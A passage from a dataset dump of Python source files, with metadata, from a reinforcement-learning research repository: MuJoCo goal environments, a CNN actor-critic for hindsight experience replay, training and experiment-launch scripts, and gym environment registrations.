net\n\n\nclass CNNActorCritic:\n @store_args\n def __init__(self, inputs_tf, image_input_shapes, dimo, dimg, dimu, max_u, o_stats, g_stats, hidden, layers,\n **kwargs):\n \"\"\"The actor-critic network and related training code.\n\n Args:\n inputs_tf (dict of tensors): all necessary inputs for the network: the\n observation (o), the goal (g), and the action (u)\n dimo (int): the dimension of the observations\n dimg (int): the dimension of the goals\n dimu (int): the dimension of the actions\n max_u (float): the maximum magnitude of actions; action outputs will be scaled\n accordingly\n o_stats (baselines.her.Normalizer): normalizer for observations\n g_stats (baselines.her.Normalizer): normalizer for goals\n hidden (int): number of hidden units that should be used in hidden layers\n layers (int): number of hidden layers\n \"\"\"\n self.o_tf = inputs_tf['o']\n self.g_tf = inputs_tf['g']\n self.u_tf = inputs_tf['u']\n\n # Prepare inputs for actor and critic.\n o = self.o_stats.normalize(self.o_tf)\n g = self.g_stats.normalize(self.g_tf)\n o = tf.reshape(o, [-1, *image_input_shapes['o']])\n g = tf.reshape(g, [-1, *image_input_shapes['g']])\n\n #print(o.shape)\n #input(\"--------------------\")\n # input_pi = tf.concat(axis=1, values=[o, g]) # for actor\n\n # Networks.\n \n \n x_o = cnn_one_stream(o, scope='phi', reuse=False)\n #print(x_o.shape)\n #input(\"----------------\")\n #x_g = cnn_one_stream(g, scope='phi', reuse=True)\n x_g = g\n \n\n x_concat = tf.concat(axis=1, values=[x_o, x_g])\n\n with tf.variable_scope('pi'):\n self.pi_tf = self.max_u * tf.tanh(nn(\n x_concat, [self.hidden] * self.layers + [self.dimu]))\n\n with tf.variable_scope('Q'):\n # for policy training\n input_Q = tf.concat(axis=1, values=[x_concat, self.pi_tf / self.max_u])\n self.Q_pi_tf = nn(input_Q, [self.hidden] * self.layers + [1])\n # for critic training\n input_Q = tf.concat(axis=1, values=[x_concat, self.u_tf / self.max_u])\n self._input_Q = input_Q # exposed for tests\n self.Q_tf = nn(input_Q, [self.hidden] * self.layers + [1], reuse=True)\n"
},
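The CNNActorCritic above wires shared features into two heads: an actor whose tanh output is scaled by max_u, and a critic fed the features concatenated with the action normalized by max_u. A framework-free numpy sketch of just that wiring — random untrained weights and invented dimensions, shapes only; this is not the repo's TensorFlow graph:

import numpy as np

rng = np.random.default_rng(0)
dim_feat, dim_u, max_u = 64, 4, 1.0

W_pi = rng.normal(scale=0.1, size=(dim_feat, dim_u))
W_q = rng.normal(scale=0.1, size=(dim_feat + dim_u, 1))

def actor(features):
    # tanh squashes to (-1, 1); scaling by max_u gives the action range.
    return max_u * np.tanh(features @ W_pi)

def critic(features, u):
    # Actions are divided by max_u before entering the Q head, mirroring
    # tf.concat(values=[x_concat, u / max_u]) in the record above.
    x = np.concatenate([features, u / max_u], axis=-1)
    return x @ W_q

feats = rng.normal(size=(8, dim_feat))   # batch of 8 feature vectors
u = actor(feats)
q = critic(feats, u)
print(u.shape, q.shape)                  # (8, 4) (8, 1)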
{
"alpha_fraction": 0.5327711701393127,
"alphanum_fraction": 0.5500191450119019,
"avg_line_length": 37.94029998779297,
"blob_id": "4ffb00addebe119e8b70697cb5b7623fa4b01851",
"content_id": "f62d0053927dcc2355404bdf8d73b5541fff06b7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2609,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 67,
"path": "/baselines_hrl/experiments/train_launch.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "# Created by Xingyu Lin, 25/03/2018\nimport time\nfrom chester.run_exp import run_experiment_lite, VariantGenerator\nfrom experiments.train import run_task\n\nif __name__ == '__main__':\n\n TestVisual = False\n Debug = False\n # Test FakeGoals\n if not TestVisual:\n # exp_prefix = 'FakeGoals_unique_zero'\n exp_prefix = 'square2d'\n vg = VariantGenerator()\n # vg.add('env_name', ['FetchPush-v0', 'FetchReach-v0'])\n vg.add('env_name', ['Square2dVisualSimple-v0'])\n # vg.add('env_name', ['FetchReach-v0', 'FetchSlide-v0', 'FetchPush-v0'])\n vg.add('network', ['cnn_fc'])\n vg.add('n_epochs', [200])\n\n # vg.add('replay_strategy', ['future', 'only_fake'])\n vg.add('replay_strategy', ['future', 'only_fake'])\n vg.add('replay_sample_strategy', ['random']) # TODO implementing 'prioritized', add to visual\n vg.add('reward_type',\n lambda replay_strategy: ['reward_func'] if replay_strategy == 'future' else ['reward_func',\n 'unique_zero'])\n # TODO add to visual\n vg.add('replay_k', lambda replay_strategy: [4] if replay_strategy == 'future' else [4])\n else:\n # Test Visual\n exp_prefix = 'square2d'\n vg = VariantGenerator()\n vg.add('network', ['cnn_fc'])\n vg.add('env_name', ['Square2dVisual-v0'])\n vg.add('n_epochs', [200])\n vg.add('replay_strategy', ['future'])\n vg.add('replay_k', lambda replay_strategy: [4] if replay_strategy == 'future' else [4])\n\n if Debug:\n exp_prefix += '_debug'\n # 'the HER replay strategy to be used. \"future\" uses HER, \"none\" disables HER.'\n vg.add('clip_return', [1])\n # 'whether or not returns should be clipped'\n vg.add('num_cpu', [1])\n vg.add('policy_save_interval', [5])\n vg.add('save_policies', [True])\n if Debug:\n vg.add('seed', [0])\n else:\n vg.add('seed', [100, 300, 400])\n print('Number of configurations: ', len(vg.variants()))\n sub_process_popens = []\n for vv in vg.variants():\n while len(sub_process_popens) >= 2:\n sub_process_popens = [x for x in sub_process_popens if x.poll() is None]\n time.sleep(10)\n cur_popen = run_experiment_lite(\n stub_method_call=run_task,\n variant=vv,\n mode='local',\n exp_prefix=exp_prefix,\n wait_subprocess=Debug\n )\n if cur_popen is not None:\n sub_process_popens.append(cur_popen)\n if Debug:\n break\n"
},
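The sweep above sets replay_strategy='future' with replay_k=4 — hindsight experience replay, where a transition's goal may be swapped for a goal actually achieved later in the same episode, with probability 1 - 1/(1 + replay_k). A simplified sketch of that relabeling rule; her_future_relabel and the toy trajectory are illustrative, not the buffer code baselines.her actually uses:

import numpy as np

def her_future_relabel(achieved_goals, goals, replay_k=4, seed=0):
    # achieved_goals, goals: (T, goal_dim) arrays for one episode.
    # Each step keeps a goal achieved at a strictly later step with
    # probability future_p = 1 - 1/(1 + replay_k) (0.8 for replay_k=4).
    rng = np.random.default_rng(seed)
    T = len(achieved_goals)
    future_p = 1.0 - 1.0 / (1.0 + replay_k)
    new_goals = goals.copy()
    for t in range(T - 1):                     # the last step has no future
        if rng.random() < future_p:
            future_t = rng.integers(t + 1, T)  # uniform over later steps
            new_goals[t] = achieved_goals[future_t]
    return new_goals

ag = np.cumsum(np.full((10, 2), 0.1), axis=0)  # toy achieved-goal path
g = np.tile([5.0, 5.0], (10, 1))               # original, hard-to-reach goal
print(her_future_relabel(ag, g))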
{
"alpha_fraction": 0.85467129945755,
"alphanum_fraction": 0.85467129945755,
"avg_line_length": 56.79999923706055,
"blob_id": "515d80252e8f634199d0d5486e3b11c1059ae3a0",
"content_id": "1ee7dd255204c1ea38bdf2451b25e1976d5571b7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 578,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 10,
"path": "/baselines_hrl/envs/gym_robotics_visual/__init__.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "from envs.gym_robotics_visual.fetch_env import FetchEnv\nfrom envs.gym_robotics_visual.fetch.slide import FetchSlideEnv\nfrom envs.gym_robotics_visual.fetch.pick_and_place import FetchPickAndPlaceEnv\nfrom envs.gym_robotics_visual.fetch.push import FetchPushEnv\nfrom envs.gym_robotics_visual.fetch.reach import FetchReachEnv\n\nfrom envs.gym_robotics_visual.hand.reach import HandReachEnv\nfrom envs.gym_robotics_visual.hand.manipulate import HandBlockEnv\nfrom envs.gym_robotics_visual.hand.manipulate import HandEggEnv\nfrom envs.gym_robotics_visual.hand.manipulate import HandPenEnv\n"
},
{
"alpha_fraction": 0.7124735713005066,
"alphanum_fraction": 0.7568710446357727,
"avg_line_length": 25.33333396911621,
"blob_id": "85998917be76719dffede3e907878310cc536f45",
"content_id": "6988ecfb60900a9e306901ec39dab95c215f2c78",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 473,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 18,
"path": "/simulation.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "from mujoco_py import load_model_from_path, MjSim, MjViewer\nimport os\nimport numpy as np\nfrom pprint import pprint\nfrom os import path\nfrom goalEnvironment import goalEnvironment\n\n\nenv = goalEnvironment(\"/home/frc-vision/Desktop/git/mujoco-env/xmls/goal.xml\")\nenv.viewer_setup()\nenv.set_goal_location(0.3,0.3)\nenv.set_frame_skip(2)\n\nwhile True:\n\t#env.send_control_command(0.002,0.002)\n\tctrl = np.asarray([0.002,0.002])\n\tobs, reward, done = env.step(ctrl)\n\tenv.render_view()"
},
{
"alpha_fraction": 0.6082192063331604,
"alphanum_fraction": 0.6630136966705322,
"avg_line_length": 72.19999694824219,
"blob_id": "3d7b81a4230e6ffb950825f5ff6c421e871f7f5e",
"content_id": "e523690c8cb325acc8c2335da001987b16b34917",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 365,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 5,
"path": "/baselines_hrl/envs/square2d/__init__.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "# Created by Xingyu Lin, 03/06/2018 \nfrom envs.square2d.square2d_env import Square2dEnv\nfrom envs.square2d.square2d_visual_env import Square2dVisualEnv\nfrom envs.square2d.square2d_visual_simple_env import Square2dVisualSimpleEnv\nfrom envs.square2d.square2d_simple import Square2dSimpleEnv"
},
{
"alpha_fraction": 0.654277503490448,
"alphanum_fraction": 0.6699775457382202,
"avg_line_length": 26.377193450927734,
"blob_id": "c7a8e44b1563b9c844e74ffd9bec1a5a3113613d",
"content_id": "ffe72af617ff3d57b6f0723f4e324821a8911cfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3121,
"license_type": "no_license",
"max_line_length": 151,
"num_lines": 114,
"path": "/goalEnvironment.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "from mujoco_py import load_model_from_path, MjSim, MjViewer\nimport os\nimport numpy as np\nfrom pprint import pprint\nfrom os import path\n\n\n\nclass goalEnvironment():\n\n\t def __init__(self, model_path, distance_threshold = 1e-1, frame_skip = 1):\n\n\t \tif model_path.startswith(\"/\"):\n\t \t\tfullpath = model_path\n\t \telse:\n\t \t\tfullpath = os.path.join(os.path.dirname(__file__), \"assets\", model_path)\n\t \tif not path.exists(fullpath):\n\t \t\traise IOError(\"File %s does not exist\" % fullpath)\n\n\t \tself.model = load_model_from_path(fullpath)\n\t \tself.sim = MjSim(self.model)\n\t \tself.data = self.sim.data\n\t \tself.viewer = MjViewer(self.sim)\n\t \tself.distance_threshold = distance_threshold\n\t \tself.frame_skip = frame_skip\n\n\t def viewer_setup(self):\n\n\t self.viewer.cam.lookat[0] = 0.0 # x,y,z offset from the object (works if trackbodyid=-1)\n\t self.viewer.cam.lookat[1] = 0.0\n\t self.viewer.cam.lookat[2] = 0.0\n\t self.viewer.cam.elevation = -90 # camera rotation around the axis in the plane going through the frame origin (if 0 you just see a line)\n\t self.viewer.cam.azimuth = 90 \n\t self.viewer.cam.distance = 1.5\n\n\t def set_goal_location(self,xLoc,yLoc):\n\t \t\n\t \tself.sim.data.qpos[0] = xLoc\n\t \tself.sim.data.qpos[1] = yLoc\n\n\t def set_ball_location(self,xLoc,yLoc):\n\t \t\n\t \tself.sim.data.qpos[2] = xLoc\n\t \tself.sim.data.qpos[3] = yLoc\t\n\n\t def set_distance_threshold(self,distance_threshold):\n\t \tself.distance_threshold = distance_threshold\n\n\t def set_frame_skip(self,frame_skip):\n\t \tself.frame_skip = frame_skip\n\n\t def get_frame_skip(self):\n\t \treturn (self.frame_skip)\n\n\t def get_distance_threshold(self):\n\t \treturn (self.distance_threshold) \n\n\t def get_ball_location(self):\n\t \treturn (self.sim.data.qpos[2:4])\t\n\n\t def get_goal_location(self):\n\t \treturn (self.sim.data.qpos[0:2])\n\n\t def get_ball_velocity(self):\n\t \treturn (self.sim.data.qvel[2:4])\n\n\t def send_control_command(self,xDirectionControl,yDirectionControl):\n\n\t \tself.sim.data.ctrl[0] = xDirectionControl\n\t \tself.sim.data.ctrl[1] = yDirectionControl\n\n\t def get_current_observation(self):\n\t \treturn np.concatenate([self.get_goal_location(), self.get_ball_location(), self.get_ball_velocity()]).ravel()\n\n\t def get_image_of_goal_observation(self, xLoc = None, yLoc = None):\n\t \t\n\t \tif not xLoc:\n\t \t\txLoc = self.sim.data.qpos[0]\n\t \t\n\t \tif not yLoc:\n\t \t\tyLoc = self.sim.data.qpos[1]\t\n\t \t\n\t \tself.sim.data.qpos[0] = xLoc\n\t \tself.sim.data.qpos[1] = yLoc\n\t \tself.sim.data.qpos[2] = xLoc\n\t \tself.sim.data.qpos[3] = yLoc\n\n\t \tself.render_view()\n\n\t def do_simulation(self, ctrl, n_frames):\n\n\t \tself.send_control_command(ctrl[0],ctrl[1])\n\t \tfor _ in range(n_frames):\n\t \t\tself.take_step()\n\t\n\n\t def step(self, ctrl):\n\t \t\n\t \tself.do_simulation(ctrl, self.frame_skip)\n\t \tobs = self.get_current_observation()\n\t \treward = self.get_reward()\n\t \tdone = (reward == 1.0)\n\t \treturn obs, reward, done\n\n\t def take_step(self):\n\t \tself.sim.step()\n\n\t def render_view(self):\n\t \tself.viewer.render()\n\n\t def get_reward(self):\n\n\t \tdist = np.linalg.norm(self.sim.data.qpos[0:2] - self.sim.data.qpos[2:4], axis=-1)\t\n\t \treturn (dist < self.distance_threshold).astype(np.float32)\n"
},
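goalEnvironment's get_reward above is a pure geometry test — 1.0 once the ball is within distance_threshold of the goal, else 0.0 — and step() terminates on reward == 1.0. The same check in isolation with toy coordinates (sparse_reward is a re-statement of the record's logic for illustration, not an import from it):

import numpy as np

def sparse_reward(goal_xy, ball_xy, distance_threshold=1e-1):
    # Mirrors get_reward: a success indicator on the goal-ball distance.
    d = np.linalg.norm(np.asarray(goal_xy) - np.asarray(ball_xy), axis=-1)
    return (d < distance_threshold).astype(np.float32)

reward = sparse_reward([0.3, 0.3], [0.28, 0.31])
done = (reward == 1.0)
print(reward, done)   # 1.0 True -- distance ~0.022 is inside the 0.1 threshold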
{
"alpha_fraction": 0.6227259039878845,
"alphanum_fraction": 0.6279451251029968,
"avg_line_length": 36.25555419921875,
"blob_id": "8fb989ad97ab7c4091cfd06ab433a13e1700132c",
"content_id": "c1d543c1ef83730d83078149b235d2649621fe8f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6706,
"license_type": "permissive",
"max_line_length": 123,
"num_lines": 180,
"path": "/baselines_hrl/experiments/train.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport numpy as np\nimport json\nfrom mpi4py import MPI\n\nfrom baselines import logger\nfrom baselines.common import set_global_seeds\nfrom baselines.common.mpi_moments import mpi_moments\nfrom baselines.her.rollout import RolloutWorker\nfrom baselines.her.util import mpi_fork\n\nimport experiments.config as config\n\nimport envs\n\n\ndef shapes_to_dims(input_shapes):\n return {key: np.prod(val) for key, val in input_shapes.items()}\n\n\ndef mpi_average(value):\n if value == []:\n value = [0.]\n if not isinstance(value, list):\n value = [value]\n return mpi_moments(np.array(value))[0]\n\n\ndef train(policy, rollout_worker, evaluator,\n n_epochs, n_test_rollouts, n_cycles, n_batches, policy_save_interval,\n save_policies, **kwargs):\n rank = MPI.COMM_WORLD.Get_rank()\n\n latest_policy_path = os.path.join(logger.get_dir(), 'policy_latest.pkl')\n best_policy_path = os.path.join(logger.get_dir(), 'policy_best.pkl')\n periodic_policy_path = os.path.join(logger.get_dir(), 'policy_{}.pkl')\n\n logger.info(\"Training...\")\n best_success_rate = -1\n for epoch in range(n_epochs):\n # train\n rollout_worker.clear_history()\n for _ in range(n_cycles):\n episode = rollout_worker.generate_rollouts()\n policy.store_episode(episode)\n for _ in range(n_batches):\n policy.train()\n policy.update_target_net()\n\n # test\n evaluator.clear_history()\n for _ in range(n_test_rollouts):\n evaluator.generate_rollouts()\n\n # record [logs\n logger.record_tabular('epoch', epoch)\n for key, val in evaluator.logs('test'):\n logger.record_tabular(key, mpi_average(val))\n for key, val in rollout_worker.logs('train'):\n logger.record_tabular(key, mpi_average(val))\n for key, val in policy.logs():\n logger.record_tabular(key, mpi_average(val))\n\n if rank == 0:\n logger.dump_tabular()\n\n # save the policy if it's better than the previous ones\n success_rate = mpi_average(evaluator.current_success_rate())\n if rank == 0 and success_rate >= best_success_rate and save_policies:\n best_success_rate = success_rate\n logger.info(\n 'New best success rate: {}. 
Saving policy to {} ...'.format(best_success_rate, best_policy_path))\n evaluator.save_policy(best_policy_path)\n evaluator.save_policy(latest_policy_path)\n if rank == 0 and policy_save_interval > 0 and epoch % policy_save_interval == 0 and save_policies:\n policy_path = periodic_policy_path.format(epoch)\n logger.info('Saving periodic policy to {} ...'.format(policy_path))\n evaluator.save_policy(policy_path)\n\n # make sure that different threads have different seeds\n local_uniform = np.random.uniform(size=(1,))\n root_uniform = local_uniform.copy()\n MPI.COMM_WORLD.Bcast(root_uniform, root=0)\n if rank != 0:\n assert local_uniform[0] != root_uniform[0]\n\n\ndef run_task(vv, log_dir=None, exp_name=None):\n override_params = {}\n # Fork for multi-CPU MPI implementation.\n if vv['num_cpu'] > 1:\n whoami = mpi_fork(vv['num_cpu'])\n if whoami == 'parent':\n sys.exit(0)\n import baselines.common.tf_util as U\n U.single_threaded_session().__enter__()\n rank = MPI.COMM_WORLD.Get_rank()\n\n\n log_dir='/media/part/cmu_ri/deep/deep_RL/data/local/square2d-debug/square2d_debug_2018_06_17/' #hack for now, fix later\n\n # Configure logging\n if rank == 0:\n if log_dir or logger.get_dir() is None:\n from pathlib import Path\n logger.configure(dir=log_dir, exp_name=exp_name)\n else:\n if log_dir or logger.get_dir() is None:\n from pathlib import Path\n logger.configure(dir=log_dir, exp_name=exp_name)\n\n logdir = logger.get_dir()\n #logdir = ''# a quick hack, fix later\n assert logdir is not None\n os.makedirs(logdir, exist_ok=True)\n\n # Seed everything.\n rank_seed = vv['seed'] + 1000000 * rank\n set_global_seeds(rank_seed)\n\n # Prepare params.\n params = config.DEFAULT_PARAMS\n params['env_name'] = vv['env_name']\n params['replay_strategy'] = vv['replay_strategy']\n params['replay_sample_strategy'] = vv['replay_sample_strategy']\n params['reward_type'] = vv['reward_type']\n params['replay_k'] = vv['replay_k']\n if vv['network'] == 'fc':\n params['network_class'] = 'baselines.her.actor_critic:ActorCritic'\n elif vv['network'] == 'cnn_fc':\n params['network_class'] = 'baselines.her.cnn_actor_critic:CNNActorCritic'\n\n if vv['env_name'] in config.DEFAULT_ENV_PARAMS:\n params.update(config.DEFAULT_ENV_PARAMS[vv['env_name']]) # merge env-specific parameters in\n params.update(**override_params) # makes it possible to override any parameter\n with open(os.path.join(logger.get_dir(), 'variant.json'), 'w') as f:\n json.dump(params, f)\n params = config.prepare_params(params)\n config.log_params(params, logger=logger)\n\n shapes = config.configure_shapes(params)\n dims = shapes_to_dims(shapes)\n policy = config.configure_ddpg(dims=dims, shapes=shapes, params=params, clip_return=vv['clip_return'])\n\n rollout_params = {\n 'exploit': False,\n 'use_target_net': False,\n 'use_demo_states': True,\n 'compute_Q': False,\n 'T': params['T'],\n }\n\n eval_params = {\n 'exploit': True,\n 'use_target_net': params['test_with_polyak'],\n 'use_demo_states': False,\n 'compute_Q': True,\n 'T': params['T'],\n }\n\n for name in ['T', 'rollout_batch_size', 'gamma', 'noise_eps', 'random_eps']:\n rollout_params[name] = params[name]\n eval_params[name] = params[name]\n\n rollout_worker = RolloutWorker(params['make_env'], policy, dims, logger, **rollout_params)\n rollout_worker.seed(rank_seed)\n\n evaluator = RolloutWorker(params['make_env'], policy, dims, logger, **eval_params)\n evaluator.seed(rank_seed)\n\n train(\n logdir=logdir, policy=policy, rollout_worker=rollout_worker,\n evaluator=evaluator, n_epochs=vv['n_epochs'], 
n_test_rollouts=params['n_test_rollouts'],\n n_cycles=params['n_cycles'], n_batches=params['n_batches'],\n policy_save_interval=vv['policy_save_interval'], save_policies=vv['save_policies'])\n\n# @click.option('--logdir', type=str, default='/media/xingyu/ExtraDrive1/data_vHER/',\n# help='the path to where logs and policy pickles should go. If not specified, creates a folder in /tmp/')\n# @click.option('--exp_name', type=str, default='push')\n"
},
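Every statistic logged by train() above passes through mpi_average, i.e. baselines' mpi_moments mean across MPI workers, after coercing an empty list to [0.] and wrapping bare scalars. A single-process sketch of the same reduction — local_average is a stand-in name; with one worker the cross-process mean degenerates to a plain mean:

import numpy as np

def local_average(value):
    # Same guard clauses as mpi_average in the record above.
    if value == []:
        value = [0.]
    if not isinstance(value, list):
        value = [value]
    return float(np.mean(value))

print(local_average([]))         # 0.0
print(local_average(3.5))        # 3.5
print(local_average([1, 2, 3]))  # 2.0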
{
"alpha_fraction": 0.5726169943809509,
"alphanum_fraction": 0.5887348055839539,
"avg_line_length": 32.35838317871094,
"blob_id": "8b23d6094e094fe69f29c4d39f5f8839ac90ac9f",
"content_id": "4eb76418d36633d73a9f1f049ccb59b6a9c979a7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5770,
"license_type": "permissive",
"max_line_length": 145,
"num_lines": 173,
"path": "/baselines_hrl/envs/square2d/square2d_nongoal.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "# Created by Xingyu Lin, 10/06/2018 \nfrom mujoco_py import load_model_from_path, MjSim, MjViewer\n# from gym import spaces\nfrom rllab import spaces\nfrom gym import Env, GoalEnv\nfrom gym.utils import seeding\nimport os\nimport numpy as np\nfrom os import path\n\n\nclass Square2dEnv(Env):\n # TODO make this into GoalEnv\n def __init__(self, model_path='./square2d.xml', distance_threshold=1e-1, frame_skip=2, goal=[0.3, 0.3],\n horizon=100):\n\n if model_path.startswith(\"/\"):\n fullpath = model_path\n else:\n fullpath = os.path.join(os.path.dirname(__file__), model_path)\n if not path.exists(fullpath):\n raise IOError(\"File %s does not exist\" % fullpath)\n\n self.model = load_model_from_path(fullpath)\n self.seed()\n self.sim = MjSim(self.model)\n self.data = self.sim.data\n self.viewer = None\n self.distance_threshold = distance_threshold\n self.frame_skip = frame_skip\n self.set_goal_location(goal)\n self.reward_type = 'dense'\n self.horizon = horizon\n self.time_step = 0\n obs = self.get_current_observation()\n self.action_space = spaces.Box(-1., 1., shape=(2,))\n self.observation_space = spaces.Box(-np.inf, np.inf, shape=obs.shape)\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def reset(self):\n self.set_ball_location([0., 0.])\n self.sim.forward()\n self.time_step = 0\n return self.get_current_observation()\n\n def _get_viewer(self):\n if self.viewer is None:\n self.viewer = MjViewer(self.sim)\n self.viewer_setup()\n return self.viewer\n\n def viewer_setup(self):\n\n self.viewer.cam.lookat[0] = 0.0 # x,y,z offset from the object (works if trackbodyid=-1)\n self.viewer.cam.lookat[1] = 0.0\n self.viewer.cam.lookat[2] = 0.0\n self.viewer.cam.elevation = -90 # camera rotation around the axis in the plane going through the frame origin (if 0 you just see a line)\n self.viewer.cam.azimuth = 90\n self.viewer.cam.distance = 1.5\n\n def set_goal_location(self, goalPos):\n # goal = [xLoc, yLoc]\n assert np.linalg.norm(np.asarray(goalPos) - np.asarray([0.3, 0.3]), axis=-1) < 0.1\n self.sim.data.qpos[0] = goalPos[0]\n self.sim.data.qpos[1] = goalPos[1]\n\n def set_ball_location(self, ballPos):\n\n self.sim.data.qpos[2] = ballPos[0]\n self.sim.data.qpos[3] = ballPos[1]\n\n def set_distance_threshold(self, distance_threshold):\n self.distance_threshold = distance_threshold\n\n def set_frame_skip(self, frame_skip):\n self.frame_skip = frame_skip\n\n def get_frame_skip(self):\n return self.frame_skip\n\n def get_distance_threshold(self):\n return self.distance_threshold\n\n def get_ball_location(self):\n return self.sim.data.qpos[2:4]\n\n def get_goal_location(self):\n return self.sim.data.qpos[0:2]\n\n def get_ball_velocity(self):\n return self.sim.data.qvel[2:4]\n\n def send_control_command(self, xDirectionControl, yDirectionControl):\n\n self.sim.data.ctrl[0] = xDirectionControl\n self.sim.data.ctrl[1] = yDirectionControl\n\n def get_current_observation(self):\n obs = np.concatenate([self.get_goal_location(), self.get_ball_location(), self.get_ball_velocity()]).ravel()\n return obs.copy()\n # obs = np.concatenate([self.get_ball_location(), self.get_ball_velocity()]).ravel()\n # desired_goal = self.get_goal_location()\n # achieved_goal = self.get_ball_location()\n # return {\n # 'observation': obs.copy(),\n # 'achieved_goal': achieved_goal.copy(),\n # 'desired_goal': desired_goal.copy()\n #\n # }\n\n def get_image_of_goal_observation(self, xLoc=None, yLoc=None):\n\n if not xLoc:\n xLoc = self.sim.data.qpos[0]\n\n if not yLoc:\n yLoc 
= self.sim.data.qpos[1]\n\n self.sim.data.qpos[0] = xLoc\n self.sim.data.qpos[1] = yLoc\n self.sim.data.qpos[2] = xLoc\n self.sim.data.qpos[3] = yLoc\n\n self.render()\n\n def do_simulation(self, ctrl, n_frames):\n self.send_control_command(ctrl[0], ctrl[1])\n for _ in range(n_frames):\n self.take_step()\n\n def step(self, ctrl):\n\n if np.linalg.norm(self.get_goal_location() - [0.3, 0.3], axis=-1) > 0.1:\n print(self.get_goal_location())\n # assert False\n ctrl = np.clip(ctrl, -1., 1.)\n self.do_simulation(ctrl, self.frame_skip)\n obs = self.get_current_observation()\n info = {\n }\n reward = self.compute_reward(self.get_ball_location(), self.get_goal_location(), {})\n done = (reward == 1.0)\n self.time_step += 1\n if self.time_step >= self.horizon:\n done = True\n return obs, reward, done, info\n\n def take_step(self):\n self.sim.step()\n\n def render(self, mode='human'):\n self._get_viewer().render()\n\n def compute_reward(self, achieved_goal, desired_goal, info):\n # Compute distance between goal and the achieved goal.\n d = np.linalg.norm(achieved_goal - desired_goal, axis=-1)\n if self.reward_type == 'sparse':\n return -(d > self.distance_threshold).astype(np.float32)\n else:\n return -d\n\n def _is_success(self, achieved_goal, desired_goal):\n d = np.linalg.norm(achieved_goal - desired_goal, axis=-1)\n return (d < self.distance_threshold).astype(np.float32)\n\n def log_diagnostics(self, paths):\n pass\n\n def terminate(self):\n pass"
},
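Square2dEnv.compute_reward above switches on reward_type: 'sparse' gives -(d > threshold), i.e. -1 until the ball is within the threshold and 0 afterwards, while 'dense' returns the negative distance as a shaped signal. Both branches on toy coordinates — a re-statement for illustration, runnable without the simulator:

import numpy as np

def compute_reward(achieved_goal, desired_goal, reward_type='dense', threshold=1e-1):
    d = np.linalg.norm(np.asarray(achieved_goal) - np.asarray(desired_goal), axis=-1)
    if reward_type == 'sparse':
        return -(d > threshold).astype(np.float32)  # -1.0 or 0.0
    return -d                                       # smooth negative distance

ball, goal = np.array([0.1, 0.0]), np.array([0.3, 0.3])
print(compute_reward(ball, goal, 'sparse'))  # -1.0
print(compute_reward(ball, goal, 'dense'))   # ~-0.3606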
{
"alpha_fraction": 0.5966782569885254,
"alphanum_fraction": 0.6171826720237732,
"avg_line_length": 29.672956466674805,
"blob_id": "fdf3502571b5c1743238768a2ccf442ea0095daf",
"content_id": "bd60f95da653c2cfbaf589067977027d9e4278f2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4877,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 159,
"path": "/baselines_hrl/envs/__init__.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "# Created by Xingyu Lin, 18/03/2018 \nfrom gym.envs.registration import register\n\n# square2d registration\nregister(\n id='Square2d-v0',\n entry_point='envs.square2d:Square2dEnv',\n max_episode_steps=1000\n)\n\nregister(\n id='Square2dVisual-v0',\n entry_point='envs.square2d:Square2dVisualEnv',\n max_episode_steps=1000\n)\n\n\nregister(\n id='Square2dSimple-v0',\n entry_point='envs.square2d:Square2dSimpleEnv',\n max_episode_steps=1000\n )\n\n\nregister(\n id='Square2dVisualSimple-v0',\n entry_point='envs.square2d:Square2dVisualSimpleEnv',\n max_episode_steps=1000\n )\n# Reference: Visual Gym registration\n# ---------------------------\n\ndef _merge(a, b):\n a.update(b)\n return a\n\n\nfor reward_type in ['sparse', 'dense']:\n suffix = 'Dense' if reward_type == 'dense' else ''\n kwargs = {\n 'reward_type': reward_type,\n }\n\n # Fetch\n register(\n id='VisualFetchSlide{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:FetchSlideEnv',\n kwargs=kwargs,\n max_episode_steps=50,\n )\n\n register(\n id='VisualFetchPickAndPlace{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:FetchPickAndPlaceEnv',\n kwargs=kwargs,\n max_episode_steps=50,\n )\n\n register(\n id='VisualFetchReach{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:FetchReachEnv',\n kwargs=kwargs,\n max_episode_steps=50,\n )\n\n register(\n id='VisualFetchPush{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:FetchPushEnv',\n kwargs=kwargs,\n max_episode_steps=50,\n )\n\n # Hand\n register(\n id='VisualHandReach{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandReachEnv',\n kwargs=kwargs,\n max_episode_steps=50,\n )\n\n register(\n id='VisualHandManipulateBlockRotateZ{}-v0'.format(suffix),\n 